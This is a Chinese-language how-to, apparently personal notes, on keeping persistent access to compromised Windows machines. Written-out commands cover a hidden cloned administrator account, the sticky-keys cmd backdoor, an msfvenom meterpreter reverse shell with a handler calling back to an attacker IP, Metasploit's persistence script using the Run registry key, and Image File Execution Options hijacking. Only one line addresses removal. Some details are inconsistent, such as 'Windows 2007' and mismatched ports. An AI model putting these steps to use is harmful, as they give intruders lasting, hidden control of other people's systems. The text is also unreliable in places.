windows 权限维持
一 修改注册表建立隐藏用户
一.环境 windows 2007
CMD命令行下,建立了一个用户名为test$,密码为test的用户,并加入管理员组 ,cMD命令行使用"net user",看不到"test$"这个账号,但在控制面板和本地用户和组是可以显示此用户的。
net user test$ test /add
net localgroup administrators test$ /add
首先打开CMD,输入regedt32.exe,进入注册表,然后把名叫:administrator的用户给予:完全控制以及读取的权限,在后面打勾就行,然后关闭注册表编辑器,再次打开即可。
然后来到如下目录,找到test$用户所对应的类型(0x3eb)的文件,如下面箭头所示
找到administrator所对应的的项为“000001F4”,将“000001F4”的F值复制到“000003EB”的F值中,保存
分别把test$和“000003EC导出到桌面,保存为test$.rag 和 1.rag .删除test$用户 net user test$ /del
然后将刚才导出的两个后缀为.reg的注册表项导入注册表中(双击就行了)。这样所谓的隐藏账户就创建好了(这样是克隆管理员账号)。现在重启,不管你是在命令提示符下输入net user 或者在登录界面都是看不到test$r这个账户的,只有在注册表中才能看得到
现在这个用户还在
二 shift后门
shift后门是黑客希望以后方便进入服务器而在没有密码的情况下为进入服务器系统而设置的一个后门。
其操作就是在不知道管理员密码的情况下,连续按5次shift键来启动粘滞键,已进入服务器的系统程序管理器。
move sethc.exe sethc.exe.bak
copy cmd.exe sethc.exe
这样没登录就能拥有一个cmd
MSF 反弹shell以及后门
先在服务器中建立一个msf shell
生成exe,想通过webshell等方式传入被攻击机
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.217 LPORT=1256 -f exe >xx.exe
进入msf,监听端口
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.100.217
set LPORT 1218
exploit
在被攻击机中执行xx.exe
建立后门
在msf后门中执行
run persistence -U -i 10 -p 7898 -r 192.168.100.217
-i:设置反向连接间隔时间,单位为秒;
-U:设置后门在用户登录后自启动。该方式会在HKCU\Software\Microsoft\Windows\CurrentVersion\Run下添加注册表信息。推荐使用该参数;
-p:设置反向连接的端口号(攻击机端口号);
-r:设置反向连接的ip地址(攻击机iP)。
`
MSF会在目标主机中生成一个vbs文件,并执行
然后执行background后台运行
然后设置LPORT
执行
一个后门到手
重启动后任然可以连接
解决办法,删除刚才目录下的vbs;
镜像劫持
所谓镜像劫持,简单地说是程序执行重定向的过程
所谓的镜像劫持,就是在注册表的[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\ CurrentVersion\Image File Execution Options]处新建一个以杀毒软件主程序命名的项,例如123.exe。然后再创建一个子键“Debugger=C:\WINDOWS\system32\cmd.exe"
在程序中找一个exe(sethc.exe),更名为123.exe,然后双击。弹出cmd.exe